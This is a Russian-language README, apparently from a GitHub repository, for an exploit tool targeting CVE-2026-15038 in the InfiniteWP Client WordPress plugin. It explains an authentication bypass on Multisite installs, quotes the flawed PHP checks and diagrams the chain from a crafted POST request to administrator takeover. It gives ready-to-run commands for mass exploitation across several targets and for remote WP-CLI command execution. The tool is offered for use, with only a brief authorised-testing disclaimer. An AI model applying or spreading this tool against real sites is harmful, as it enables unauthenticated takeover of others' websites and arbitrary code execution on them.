
PoC-эксплойт для CVE-2026-15038 в плагине InfiniteWP Client для WordPress: обходит аутентификацию в Multisite, привязывает RSA-ключ атакующего, повышает привилегии до полного захвата администратора и выполняет удалённые команды через WP-CLI.
Неаутентифицированный захват учётной записи администратора в WordPress Multisite
Плагин InfiniteWP Client для WordPress (< 1.13.6) содержит критическую уязвимость обхода аутентификации, затрагивающую установки Multisite.
Неаутентифицированный злоумышленник может:
if (!$iwp_mmb_core->get_option('iwp_client_action_message_id')
&& !$iwp_mmb_core->get_option('iwp_client_public_key'))
get_site_option() → читает на сетевом уровне (wp_sitemeta)update_blog_option() → записывает в таблицы отдельных блогов (wp_X_options)💥 Результат: В Multisite проверка всегда возвращает false — повторное сопряжение разрешено всегда.
if(trim($activation_key) != get_option('iwp_client_activate_key')){
get_option() возвращает falseactivation_key → trim(null) → '''' != false → false → Проверка пройдена 🎯openssl_verify() проходит успешноgraph LR
A[Отправка POST-запроса] --> B[Действие Add Site]
B --> C[Защитный механизм обойдён]
C --> D[Проверка ключа активации не проходит]
D --> E[Подпись подтверждена]
E --> F[Ключ злоумышленника привязан]
F --> G[Полный доступ администратора]
G --> H[Достигнут RCE]
# Клонирование репозитория
git clone https://github.com/yourusername/CVE-2026-15038.git
cd CVE-2026-15038
# Установка зависимостей
pip install -r requirements.txt
python3 exploit.py -t https://wordpress.ddev.site
python3 exploit.py -t https://target1.com -t https://target2.com -t https://target3.com
python3 exploit.py -t https://wordpress.ddev.site --command "wp plugin install hello-dolly --activate"
python3 exploit.py -t https://wordpress.ddev.site --takeover --rce
| Файл | Описание |
|---|---|
exploit.py | 🐍 Основной скрипт эксплойта с поддержкой массовой эксплуатации |
requirements.txt | 📦 Зависимости Python |
README.md | 📖 Эта документация |
add_site в журналахЭтот инструмент предназначен только для образовательных целей и тестирования безопасности. Используйте его только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Авторы не несут ответственности за неправомерное использование.